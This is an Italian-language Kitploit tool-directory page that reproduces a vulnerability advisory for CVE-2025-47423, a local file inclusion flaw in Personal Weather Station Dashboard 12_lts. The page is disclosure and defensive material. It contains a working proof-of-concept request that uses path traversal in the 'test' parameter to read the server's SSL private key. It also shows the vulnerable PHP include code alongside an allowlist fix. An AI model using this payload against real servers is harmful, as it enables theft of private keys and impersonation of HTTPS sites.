Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-47423 | Kitploit
Strumenti/GitHubGitHub/haluka92/cve-2025-47423
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPaper e RicercaApprendimento e FormazioneRisorse Curate
GitHubhaluka92/cve-2025-47423

CVE-2025-47423

Vedi Repository
1 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-47423 – Local File Inclusion nel Personal Weather Station Dashboard (12_lts)

Scoperta da: Matthew Eagle
Stato: Divulgazione pubblica
Data di segnalazione: 2025-05-05
ID CVE: CVE-2025-47423


🧩 Riepilogo

Una vulnerabilità di Local File Inclusion (LFI) nel Personal Weather Station Dashboard versione 12_lts consente ad attaccanti remoti non autenticati di leggere file arbitrari sul server. Lo sfruttamento di questa falla concede l'accesso a file sensibili, incluse le chiavi SSL private, compromettendo potenzialmente la riservatezza e l'integrità delle connessioni HTTPS.


🛠 Componente interessato

  • File: /others/_test.php
  • Parametro vulnerabile: test (via GET)

📈 Impatto

Questa falla consente ad attaccanti remoti di:

  • Leggere file arbitrari dal filesystem
  • Esporre chiavi SSL private (ad es. server.key)
  • Eseguire attacchi man-in-the-middle (MITM)
  • Impersonare il server HTTPS

CVSS: 5.8 Medio


💥 Proof of Concept (PoC)

root@kitploit:~
GET /others/_test.php?test=../../../apache/conf/ssl.key/server.key HTTP/1.1
Host: www.example.com

Risposta:

root@kitploit:~
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAs2omMqKSB+lm7xu9Nu3C5...
...TRUNCATED...
-----END RSA PRIVATE KEY-----

🧪 Codice Vulnerabile (Semplificato)

root@kitploit:~
$script = trim($_GET['test']);
$script = str_replace('../','',$script);
include($script);

Il str_replace non è sufficiente a prevenire il directory traversal.


🔐 Correzione di Sicurezza

  • Utilizzare una allowlist rigorosa per i target di inclusione
  • Sanificare l'input con basename() e verificarlo rispetto ai file consentiti
  • Evitare l'inclusione dinamica basata sull'input dell'utente
root@kitploit:~
$allowed_tests = ['index.php', 'module_test.php'];
$script = isset($_GET['test']) ? basename($_GET['test']) : 'index.php';

if (!in_array($script, $allowed_tests)) {
    die("Invalid test file.");
}

include(__DIR__ . '/scripts/' . $script);

📅 Cronologia

DateEvent
2025-05-05Vulnerabilità segnalata ai moderatori del PWS Dashboard
2025-05-06Riconoscimento e test osservati
2025-05-07CVE-2025-47423 riservato tramite MITRE
TBDPatch pubblica e pubblicazione CVE in sospeso

🧠 Mitigazione

Se stai eseguendo Personal Weather Station Dashboard 12_lts, dovresti:

  • Rimuovere o aggiornare immediatamente _test.php
  • Implementare lo script corretto con la whitelist dei file
  • Ruotare e riemettere eventuali certificati TLS compromessi

🧾 Riferimenti

  • CVE-2025-47423 su MITRE (in sospeso)
  • Advisory pubblicato su GitHub

🙏 Riconoscimenti

Vulnerabilità scoperta e divulgata in modo responsabile da Matthew Eagle
Contatto: [email protected]


Divulgazione coordinata nel rispetto delle linee guida sulla responsible disclosure. Questo documento è rilasciato a scopo educativo e difensivo.

Scarica lo strumento